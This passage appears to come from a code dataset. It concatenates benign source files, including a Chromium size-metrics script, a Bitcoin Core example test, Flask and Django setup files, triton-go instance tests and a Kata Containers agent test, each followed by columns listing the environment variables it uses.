return ret
except OSError:
logging.critical('Failed to get gzipped size: %s', filename)
return 0
def _get_catagorized_filesizes(filename):
"""Measures |filename| sizes under various transforms.
Returns: A Counter (keyed by _Key_* constants) that stores measured sizes.
"""
sizes = collections.Counter()
sizes[_KEY_RAW] = _get_filesize(filename)
sizes[_KEY_GZIPPED] = _get_gzipped_filesize(filename)
# Pre-assign values for non-ELF, or in case of failure for ELF.
sizes[_KEY_STRIPPED] = sizes[_KEY_RAW]
sizes[_KEY_STRIPPED_GZIPPED] = sizes[_KEY_GZIPPED]
if _is_probably_elf(filename) and not _is_unstrippable_elf(filename):
try:
fd, temp_file = tempfile.mkstemp()
os.close(fd)
cmd = [EU_STRIP_PATH, filename, '-o', temp_file]
subprocess.check_output(cmd)
sizes[_KEY_STRIPPED] = _get_filesize(temp_file)
sizes[_KEY_STRIPPED_GZIPPED] = _get_gzipped_filesize(temp_file)
if sizes[_KEY_STRIPPED] > sizes[_KEY_RAW]:
# This weird case has been observed for libwidevinecdm.so.
logging.critical('Stripping made things worse for %s' % filename)
except subprocess.CalledProcessError:
logging.critical('Failed to strip file: %s' % filename)
finally:
os.unlink(temp_file)
return sizes
def _dump_chart_json(output_dir, chartjson):
"""Writes chart histogram to JSON files.
Output files:
results-chart.json contains the chart JSON.
perf_results.json contains histogram JSON for Catapult.
Args:
output_dir: Directory to place the JSON files.
chartjson: Source JSON data for output files.
"""
results_path = os.path.join(output_dir, 'results-chart.json')
logging.critical('Dumping chartjson to %s', results_path)
with open(results_path, 'w') as json_file:
json.dump(chartjson, json_file, indent=2)
# We would ideally generate a histogram set directly instead of generating
# chartjson then converting. However, perf_tests_results_helper is in
# //build, which doesn't seem to have any precedent for depending on
# anything in Catapult. This can probably be fixed, but since this doesn't
# need to be super fast or anything, converting is a good enough solution
# for the time being.
histogram_result = convert_chart_json.ConvertChartJson(results_path)
if histogram_result.returncode != 0:
raise Exception('chartjson conversion failed with error: ' +
histogram_result.stdout)
histogram_path = os.path.join(output_dir, 'perf_results.json')
logging.critical('Dumping histograms to %s', histogram_path)
with open(histogram_path, 'wb') as json_file:
json_file.write(histogram_result.stdout)
def _run_resource_sizes(args):
"""Main flow to extract and output size data."""
chartjson = _BASE_CHART.copy()
report_func = perf_tests_results_helper.ReportPerfResult
total_sizes = collections.Counter()
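  # Reports the raw size under |title|, plus stripped and/or gzipped variants
  # when the corresponding flags are set.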
def report_sizes(sizes, title, track_stripped, track_compressed):
report_func(chart_data=chartjson,
graph_title=title,
trace_title='size',
value=sizes[_KEY_RAW],
units='bytes')
if track_stripped:
report_func(chart_data=chartjson,
graph_title=title + ' (Stripped)',
trace_title='size',
value=sizes[_KEY_STRIPPED],
units='bytes')
if track_compressed:
report_func(chart_data=chartjson,
graph_title=title + ' (Gzipped)',
trace_title='size',
value=sizes[_KEY_GZIPPED],
units='bytes')
if track_stripped and track_compressed:
report_func(chart_data=chartjson,
graph_title=title + ' (Stripped, Gzipped)',
trace_title='size',
value=sizes[_KEY_STRIPPED_GZIPPED],
units='bytes')
for g in _TRACKED_GROUPS:
sizes = sum(
map(_get_catagorized_filesizes, _visit_paths(args.out_dir, g.paths)),
collections.Counter())
report_sizes(sizes, g.title, g.track_stripped, g.track_compressed)
# Total compressed size is summed over individual compressed sizes, instead
    # of concatenating first and then compressing everything. This is done for
# simplicity. It also gives a conservative size estimate (assuming file
# metadata and overheads are negligible).
total_sizes += sizes
report_sizes(total_sizes, 'Total', True, True)
_dump_chart_json(args.output_dir, chartjson)
def main():
"""Parses arguments and runs high level flows."""
argparser = argparse.ArgumentParser(description='Writes LaCrOS size metrics.')
argparser.add_argument('--chromium-output-directory',
dest='out_dir',
required=True,
type=os.path.realpath,
help='Location of the build artifacts.')
output_group = argparser.add_mutually_exclusive_group()
output_group.add_argument('--output-dir',
default='.',
help='Directory to save chartjson to.')
# Accepted to conform to the isolated script interface, but ignored.
argparser.add_argument('--isolated-script-test-filter',
help=argparse.SUPPRESS)
argparser.add_argument('--isolated-script-test-perf-output',
type=os.path.realpath,
help=argparse.SUPPRESS)
output_group.add_argument(
'--isolated-script-test-output',
type=os.path.realpath,
help='File to which results will be written in the simplified JSON '
'output format.')
args = argparser.parse_args()
isolated_script_output = {'valid': False, 'failures': []}
if args.isolated_script_test_output:
test_name = 'lacros_resource_sizes'
args.output_dir = os.path.join(
os.path.dirname(args.isolated_script_test_output), test_name)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
try:
_run_resource_sizes(args)
isolated_script_output = {'valid': True, 'failures': []}
finally:
if args.isolated_script_test_output:
results_path = os.path.join(args.output_dir, 'test_results.json')
with open(results_path, 'w') as output_file:
json.dump(isolated_script_output, output_file)
with open(args.isolated_script_test_output, 'w') as output_file:
json.dump(isolated_script_output, output_file)
if __name__ == '__main__':
main()
| []
| []
| [
"CHECKOUT_SOURCE_ROOT"
]
| [] | ["CHECKOUT_SOURCE_ROOT"] | python | 1 | 0 | |
test/functional/example_test.py | #!/usr/bin/env python3
# Copyright (c) 2017-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""An example functional test
The module-level docstring should include a high-level description of
what the test is doing. It's the first thing people see when they open
the file and should give the reader information about *what* the test
is testing and *how* it's being tested
"""
# Imports should be in PEP8 ordering (std library first, then third party
# libraries then local imports).
from collections import defaultdict
# Avoid wildcard * imports
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.messages import CInv, MSG_BLOCK
from test_framework.p2p import (
P2PInterface,
msg_block,
msg_getdata,
p2p_lock,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
# P2PInterface is a class containing callbacks to be executed when a P2P
# message is received from the node-under-test. Subclass P2PInterface and
# override the on_*() methods if you need custom behaviour.
class BaseNode(P2PInterface):
def __init__(self):
"""Initialize the P2PInterface
Used to initialize custom properties for the Node that aren't
included by default in the base class. Be aware that the P2PInterface
base class already stores a counter for each P2P message type and the
last received message of each type, which should be sufficient for the
needs of most tests.
Call super().__init__() first for standard initialization and then
initialize custom properties."""
super().__init__()
# Stores a dictionary of all blocks received
self.block_receive_map = defaultdict(int)
def on_block(self, message):
"""Override the standard on_block callback
Store the hash of a received block in the dictionary."""
message.block.calc_sha256()
self.block_receive_map[message.block.sha256] += 1
def on_inv(self, message):
"""Override the standard on_inv callback"""
pass
def custom_function():
"""Do some custom behaviour
If this function is more generally useful for other tests, consider
moving it to a module in test_framework."""
# self.log.info("running custom_function") # Oops! Can't run self.log outside the BitcoinTestFramework
pass
class ExampleTest(BitcoinTestFramework):
# Each functional test is a subclass of the BitcoinTestFramework class.
# Override the set_test_params(), skip_test_if_missing_module(), add_options(), setup_chain(), setup_network()
# and setup_nodes() methods to customize the test setup as required.
def set_test_params(self):
"""Override test parameters for your individual test.
This method must be overridden and num_nodes must be explicitly set."""
# By default every test loads a pre-mined chain of 200 blocks from cache.
# Set setup_clean_chain to True to skip this and start from the Genesis
# block.
self.setup_clean_chain = True
self.num_nodes = 3
# Use self.extra_args to change command-line arguments for the nodes
self.extra_args = [[], ["-logips"], []]
# self.log.info("I've finished set_test_params") # Oops! Can't run self.log before run_test()
# Use skip_test_if_missing_module() to skip the test if your test requires certain modules to be present.
# This test uses generate which requires wallet to be compiled
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
# Use add_options() to add specific command-line options for your test.
# In practice this is not used very much, since the tests are mostly written
# to be run in automated environments without command-line options.
# def add_options()
# pass
# Use setup_chain() to customize the node data directories. In practice
# this is not used very much since the default behaviour is almost always
# fine
# def setup_chain():
# pass
# def setup_network(self):
# """Setup the test network topology
# Often you won't need to override this, since the standard network topology
# (linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests.
# If you do override this method, remember to start the nodes, assign
# them to self.nodes, connect them and then sync."""
# self.setup_nodes()
# # In this test, we're not connecting node2 to node0 or node1. Calls to
# # sync_all() should not include node2, since we're not expecting it to
# # sync.
# self.connect_nodes(0, 1)
# self.sync_all(self.nodes[0:2])
# Use setup_nodes() to customize the node start behaviour (for example if
# you don't want to start all nodes at the start of the test).
# def setup_nodes():
# pass
def custom_method(self):
"""Do some custom behaviour for this test
Define it in a method here because you're going to use it repeatedly.
If you think it's useful in general, consider moving it to the base
BitcoinTestFramework class so other tests can use it."""
self.log.info("Running custom_method")
def run_test(self):
"""Main test logic"""
### Kunal's Test
self.log.info("Node1 mining a block")
self.generate(self.nodes[1], nblocks=1)
self.log.info("Node1 has mined a block, automatically sent to node2 in network")
self.log.info("Nodes are syncing blocks now")
self.sync_blocks()
self.log.info("Nodes' blocks have been synced")
self.log.info("Checking that node2 has received block...")
assert_equal(self.nodes[1].getbestblockhash(), self.nodes[2].getbestblockhash())
self.log.info("Node2 has received and accepted the block!")
# # Create P2P connections will wait for a verack to make sure the connection is fully up
# peer_messaging = self.nodes[0].add_p2p_connection(BaseNode())
# # Generating a block on one of the nodes will get us out of IBD
# blocks = [int(self.generate(self.nodes[0], sync_fun=lambda: self.sync_all(self.nodes[0:2]), nblocks=1)[0], 16)]
# # Notice above how we called an RPC by calling a method with the same
# # name on the node object. Notice also how we used a keyword argument
# # to specify a named RPC argument. Neither of those are defined on the
# # node object. Instead there's some __getattr__() magic going on under
# # the covers to dispatch unrecognised attribute calls to the RPC
# # interface.
# # Logs are nice. Do plenty of them. They can be used in place of comments for
# # breaking the test into sub-sections.
# self.log.info("Starting test!")
# # self.log.info("Calling a custom function")
# # custom_function()
# # self.log.info("Calling a custom method")
# # self.custom_method()
# self.log.info("Create some blocks")
# self.tip = int(self.nodes[0].getbestblockhash(), 16)
# self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
# height = self.nodes[0].getblockcount()
# for _ in range(10):
# # Use the blocktools functionality to manually build a block.
# # Calling the generate() rpc is easier, but this allows us to exactly
# # control the blocks and transactions.
# block = create_block(self.tip, create_coinbase(height+1), self.block_time)
# block.solve()
# block_message = msg_block(block)
# # Send message is used to send a P2P message to the node over our P2PInterface
# peer_messaging.send_message(block_message)
# self.tip = block.sha256
# blocks.append(self.tip)
# self.block_time += 1
# height += 1
# self.log.info("Wait for node1 to reach current tip (height 11) using RPC")
# self.nodes[1].waitforblockheight(11)
# self.log.info("Connect node2 and node1")
# self.connect_nodes(1, 2)
# self.log.info("Wait for node2 to receive all the blocks from node1")
# self.sync_all()
# self.log.info("Add P2P connection to node2")
# self.nodes[0].disconnect_p2ps()
# peer_receiving = self.nodes[2].add_p2p_connection(BaseNode())
# self.log.info("Test that node2 propagates all the blocks to us")
# getdata_request = msg_getdata()
# for block in blocks:
# getdata_request.inv.append(CInv(MSG_BLOCK, block))
# peer_receiving.send_message(getdata_request)
# # wait_until() will loop until a predicate condition is met. Use it to test properties of the
# # P2PInterface objects.
# peer_receiving.wait_until(lambda: sorted(blocks) == sorted(list(peer_receiving.block_receive_map.keys())), timeout=5)
# self.log.info("Check that each block was received only once")
# # The network thread uses a global lock on data access to the P2PConnection objects when sending and receiving
# # messages. The test thread should acquire the global lock before accessing any P2PConnection data to avoid locking
# # and synchronization issues. Note p2p.wait_until() acquires this global lock internally when testing the predicate.
# with p2p_lock:
# for block in peer_receiving.block_receive_map.values():
# assert_equal(block, 1)
if __name__ == '__main__':
ExampleTest().main()
| []
| []
| []
| [] | [] | python | null | null | null |
meli_auth/__init__.py | import os
from flask import Flask
app = Flask(__name__)
from meli_auth.views import meli_views
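# Mount the auth views at the URL prefix taken from the MELI_AUTH_ROOT_URL
# environment variable; if the variable is unset, os.environ.get() returns
# None and the blueprint is registered without a prefix.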
app.register_blueprint(meli_views, url_prefix=os.environ.get('MELI_AUTH_ROOT_URL'))
| []
| []
| ["MELI_AUTH_ROOT_URL"]
| [] | ["MELI_AUTH_ROOT_URL"] | python | 1 | 0 | |
myart/wsgi.py | """
WSGI config for myart project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "myart.settings")
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
vendor/github.com/joyent/triton-go/compute/instances_test.go | package compute
import (
"context"
"errors"
"fmt"
"log"
"math/rand"
"os"
"reflect"
"testing"
"time"
triton "github.com/joyent/triton-go"
"github.com/joyent/triton-go/network"
"github.com/joyent/triton-go/testutils"
)
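// getAnyInstanceID returns the ID of any existing instance in the account;
// if no instances are available the calling test is skipped.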
func getAnyInstanceID(t *testing.T, client *ComputeClient) (string, error) {
ctx := context.Background()
input := &ListInstancesInput{}
instances, err := client.Instances().List(ctx, input)
if err != nil {
return "", err
}
for _, m := range instances {
if len(m.ID) > 0 {
return m.ID, nil
}
}
t.Skip()
return "", errors.New("no machines configured")
}
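// RandInt reseeds the random source and returns a non-negative pseudo-random int.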
func RandInt() int {
reseed()
return rand.New(rand.NewSource(time.Now().UnixNano())).Int()
}
func RandWithPrefix(name string) string {
return fmt.Sprintf("%s-%d", name, RandInt())
}
// Seeds random with current timestamp
func reseed() {
rand.Seed(time.Now().UTC().UnixNano())
}
func TestAccInstances_Create(t *testing.T) {
testInstanceName := RandWithPrefix("acctest")
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
computeClient, err := NewClient(config)
if err != nil {
return nil, err
}
networkClient, err := network.NewClient(config)
if err != nil {
return nil, err
}
return []interface{}{
computeClient,
networkClient,
}, nil
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
clients := client.([]interface{})
c := clients[0].(*ComputeClient)
n := clients[1].(*network.NetworkClient)
images, err := c.Images().List(context.Background(), &ListImagesInput{
Name: "ubuntu-16.04",
Version: "20170403",
})
img := images[0]
var net *network.Network
networkName := "Joyent-SDC-Private"
nets, err := n.List(context.Background(), &network.ListInput{})
if err != nil {
return nil, err
}
for _, found := range nets {
if found.Name == networkName {
net = found
}
}
input := &CreateInstanceInput{
Name: testInstanceName,
Package: "g4-highcpu-128M",
Image: img.ID,
Networks: []string{net.Id},
Metadata: map[string]string{
"metadata1": "value1",
},
Tags: map[string]string{
"tag1": "value1",
},
CNS: InstanceCNS{
Services: []string{"testapp", "testweb"},
},
}
created, err := c.Instances().Create(context.Background(), input)
if err != nil {
return nil, err
}
state := make(chan *Instance, 1)
go func(createdID string, c *ComputeClient) {
for {
time.Sleep(1 * time.Second)
instance, err := c.Instances().Get(context.Background(), &GetInstanceInput{
ID: createdID,
})
if err != nil {
log.Fatalf("Get(): %v", err)
}
if instance.State == "running" {
state <- instance
}
}
}(created.ID, c)
select {
case instance := <-state:
return instance, nil
case <-time.After(5 * time.Minute):
return nil, fmt.Errorf("Timed out waiting for instance to provision")
}
},
CleanupFunc: func(client interface{}, stateBag interface{}) {
instance, instOk := stateBag.(*Instance)
if !instOk {
log.Println("Expected instance to be Instance")
return
}
if instance.Name != testInstanceName {
log.Printf("Expected instance to be named %s: found %s\n",
testInstanceName, instance.Name)
return
}
clients := client.([]interface{})
c, clientOk := clients[0].(*ComputeClient)
if !clientOk {
log.Println("Expected client to be ComputeClient")
return
}
err := c.Instances().Delete(context.Background(), &DeleteInstanceInput{
ID: instance.ID,
})
if err != nil {
log.Printf("Could not delete instance %s\n", instance.Name)
}
return
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
instanceRaw, found := state.GetOk("instances")
if !found {
return fmt.Errorf("State key %q not found", "instances")
}
instance, ok := instanceRaw.(*Instance)
if !ok {
return errors.New("Expected state to include instance")
}
if instance.State != "running" {
return fmt.Errorf("Expected instance state to be \"running\": found %s",
instance.State)
}
if instance.ID == "" {
return fmt.Errorf("Expected instance ID: found \"\"")
}
if instance.Name == "" {
return fmt.Errorf("Expected instance Name: found \"\"")
}
if instance.Memory != 128 {
return fmt.Errorf("Expected instance Memory to be 128: found \"%d\"",
instance.Memory)
}
metadataVal, metaOk := instance.Metadata["metadata1"]
if !metaOk {
return fmt.Errorf("Expected instance to have Metadata: found \"%v\"",
instance.Metadata)
}
if metadataVal != "value1" {
return fmt.Errorf("Expected instance Metadata \"metadata1\" to equal \"value1\": found \"%s\"",
metadataVal)
}
tagVal, tagOk := instance.Tags["tag1"]
if !tagOk {
return fmt.Errorf("Expected instance to have Tags: found \"%v\"",
instance.Tags)
}
if tagVal != "value1" {
return fmt.Errorf("Expected instance Tag \"tag1\" to equal \"value1\": found \"%s\"",
tagVal)
}
services := []string{"testapp", "testweb"}
if !reflect.DeepEqual(instance.CNS.Services, services) {
return fmt.Errorf("Expected instance CNS Services \"%s\", to equal \"%v\"",
instance.CNS.Services, services)
}
return nil
},
},
},
})
}
func TestAccInstances_Get(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &GetInstanceInput{
ID: instanceID,
}
return c.Instances().Get(ctx, input)
},
},
&testutils.StepAssertSet{
StateBagKey: "instances",
Keys: []string{"ID", "Name", "Type", "Tags"},
},
},
})
}
// FIXME(seanc@): TestAccMachine_ListMachineTags assumes that any machine ID
// returned from getAnyInstanceID will have at least one tag.
func TestAccInstances_ListTags(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &ListTagsInput{
ID: instanceID,
}
return c.Instances().ListTags(ctx, input)
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
tagsRaw, found := state.GetOk("instances")
if !found {
return fmt.Errorf("State key %q not found", "instances")
}
tags := tagsRaw.(map[string]interface{})
if len(tags) == 0 {
return errors.New("Expected at least one tag on machine")
}
return nil
},
},
},
})
}
func TestAccInstances_UpdateMetadata(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &UpdateMetadataInput{
ID: instanceID,
Metadata: map[string]string{
"tester": os.Getenv("USER"),
},
}
return c.Instances().UpdateMetadata(ctx, input)
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
mdataRaw, found := state.GetOk("instances")
if !found {
return fmt.Errorf("State key %q not found", "instances")
}
mdata := mdataRaw.(map[string]string)
if len(mdata) == 0 {
return errors.New("Expected metadata on machine")
}
if mdata["tester"] != os.Getenv("USER") {
return errors.New("Expected test metadata to equal environ $USER")
}
return nil
},
},
},
})
}
func TestAccInstances_ListMetadata(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &ListMetadataInput{
ID: instanceID,
}
return c.Instances().ListMetadata(ctx, input)
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
mdataRaw, found := state.GetOk("instances")
if !found {
return fmt.Errorf("State key %q not found", "instances")
}
mdata := mdataRaw.(map[string]string)
if len(mdata) == 0 {
return errors.New("Expected metadata on machine")
}
if mdata["root_authorized_keys"] == "" {
return errors.New("Expected test metadata to have key")
}
return nil
},
},
},
})
}
func TestAccInstances_GetMetadata(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &UpdateMetadataInput{
ID: instanceID,
Metadata: map[string]string{
"testkey": os.Getenv("USER"),
},
}
_, err = c.Instances().UpdateMetadata(ctx, input)
if err != nil {
return nil, err
}
ctx2 := context.Background()
input2 := &GetMetadataInput{
ID: instanceID,
Key: "testkey",
}
return c.Instances().GetMetadata(ctx2, input2)
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
mdataValue := state.Get("instances")
retValue := fmt.Sprintf("\"%s\"", os.Getenv("USER"))
if mdataValue != retValue {
return errors.New("Expected test metadata to equal environ \"$USER\"")
}
return nil
},
},
},
})
}
| ["\"USER\"", "\"USER\"", "\"USER\"", "\"USER\""]
| []
| ["USER"]
| [] | ["USER"] | go | 1 | 0 | |
src/runtime/virtcontainers/kata_agent_test.go | // Copyright (c) 2018 Intel Corporation
//
// SPDX-License-Identifier: Apache-2.0
//
package virtcontainers
import (
"bufio"
"context"
"fmt"
"io/ioutil"
"os"
"path"
"path/filepath"
"reflect"
"strings"
"syscall"
"testing"
"github.com/containerd/ttrpc"
gpb "github.com/gogo/protobuf/types"
specs "github.com/opencontainers/runtime-spec/specs-go"
"github.com/stretchr/testify/assert"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/device/api"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/device/config"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/device/drivers"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/device/manager"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/persist"
aTypes "github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/agent/protocols"
pb "github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/agent/protocols/grpc"
vcAnnotations "github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/annotations"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/mock"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/rootless"
vcTypes "github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/types"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/types"
)
var (
testKataProxyURLTempl = "unix://%s/kata-proxy-test.sock"
testBlkDriveFormat = "testBlkDriveFormat"
testBlockDeviceCtrPath = "testBlockDeviceCtrPath"
testDevNo = "testDevNo"
testNvdimmID = "testNvdimmID"
testPCIAddr = "04/02"
testSCSIAddr = "testSCSIAddr"
testVirtPath = "testVirtPath"
)
func testGenerateKataProxySockDir() (string, error) {
dir, err := ioutil.TempDir("", "kata-proxy-test")
if err != nil {
return "", err
}
return dir, nil
}
func TestKataAgentConnect(t *testing.T) {
assert := assert.New(t)
proxy := mock.ProxyGRPCMock{
GRPCImplementer: &gRPCProxy{},
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.NoError(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.NoError(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
err = k.connect()
assert.NoError(err)
assert.NotNil(k.client)
}
func TestKataAgentDisconnect(t *testing.T) {
assert := assert.New(t)
proxy := mock.ProxyGRPCMock{
GRPCImplementer: &gRPCProxy{},
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.NoError(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.NoError(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
assert.NoError(k.connect())
assert.NoError(k.disconnect())
assert.Nil(k.client)
}
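// gRPCProxy provides no-op implementations of the agent's ttrpc/gRPC services
// so the mock proxy can register and serve them during these tests.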
type gRPCProxy struct{}
var emptyResp = &gpb.Empty{}
func (p *gRPCProxy) CreateContainer(ctx context.Context, req *pb.CreateContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) StartContainer(ctx context.Context, req *pb.StartContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) ExecProcess(ctx context.Context, req *pb.ExecProcessRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) SignalProcess(ctx context.Context, req *pb.SignalProcessRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) WaitProcess(ctx context.Context, req *pb.WaitProcessRequest) (*pb.WaitProcessResponse, error) {
return &pb.WaitProcessResponse{}, nil
}
func (p *gRPCProxy) ListProcesses(ctx context.Context, req *pb.ListProcessesRequest) (*pb.ListProcessesResponse, error) {
return &pb.ListProcessesResponse{}, nil
}
func (p *gRPCProxy) UpdateContainer(ctx context.Context, req *pb.UpdateContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) RemoveContainer(ctx context.Context, req *pb.RemoveContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) WriteStdin(ctx context.Context, req *pb.WriteStreamRequest) (*pb.WriteStreamResponse, error) {
return &pb.WriteStreamResponse{}, nil
}
func (p *gRPCProxy) ReadStdout(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {
return &pb.ReadStreamResponse{}, nil
}
func (p *gRPCProxy) ReadStderr(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {
return &pb.ReadStreamResponse{}, nil
}
func (p *gRPCProxy) CloseStdin(ctx context.Context, req *pb.CloseStdinRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) TtyWinResize(ctx context.Context, req *pb.TtyWinResizeRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) CreateSandbox(ctx context.Context, req *pb.CreateSandboxRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) DestroySandbox(ctx context.Context, req *pb.DestroySandboxRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) UpdateInterface(ctx context.Context, req *pb.UpdateInterfaceRequest) (*aTypes.Interface, error) {
return &aTypes.Interface{}, nil
}
func (p *gRPCProxy) UpdateRoutes(ctx context.Context, req *pb.UpdateRoutesRequest) (*pb.Routes, error) {
return &pb.Routes{}, nil
}
func (p *gRPCProxy) ListInterfaces(ctx context.Context, req *pb.ListInterfacesRequest) (*pb.Interfaces, error) {
return &pb.Interfaces{}, nil
}
func (p *gRPCProxy) ListRoutes(ctx context.Context, req *pb.ListRoutesRequest) (*pb.Routes, error) {
return &pb.Routes{}, nil
}
func (p *gRPCProxy) AddARPNeighbors(ctx context.Context, req *pb.AddARPNeighborsRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) OnlineCPUMem(ctx context.Context, req *pb.OnlineCPUMemRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) StatsContainer(ctx context.Context, req *pb.StatsContainerRequest) (*pb.StatsContainerResponse, error) {
return &pb.StatsContainerResponse{}, nil
}
func (p *gRPCProxy) Check(ctx context.Context, req *pb.CheckRequest) (*pb.HealthCheckResponse, error) {
return &pb.HealthCheckResponse{}, nil
}
func (p *gRPCProxy) Version(ctx context.Context, req *pb.CheckRequest) (*pb.VersionCheckResponse, error) {
return &pb.VersionCheckResponse{}, nil
}
func (p *gRPCProxy) PauseContainer(ctx context.Context, req *pb.PauseContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) ResumeContainer(ctx context.Context, req *pb.ResumeContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) ReseedRandomDev(ctx context.Context, req *pb.ReseedRandomDevRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) GetGuestDetails(ctx context.Context, req *pb.GuestDetailsRequest) (*pb.GuestDetailsResponse, error) {
return &pb.GuestDetailsResponse{}, nil
}
func (p *gRPCProxy) SetGuestDateTime(ctx context.Context, req *pb.SetGuestDateTimeRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
func (p *gRPCProxy) CopyFile(ctx context.Context, req *pb.CopyFileRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
func (p *gRPCProxy) StartTracing(ctx context.Context, req *pb.StartTracingRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
func (p *gRPCProxy) StopTracing(ctx context.Context, req *pb.StopTracingRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
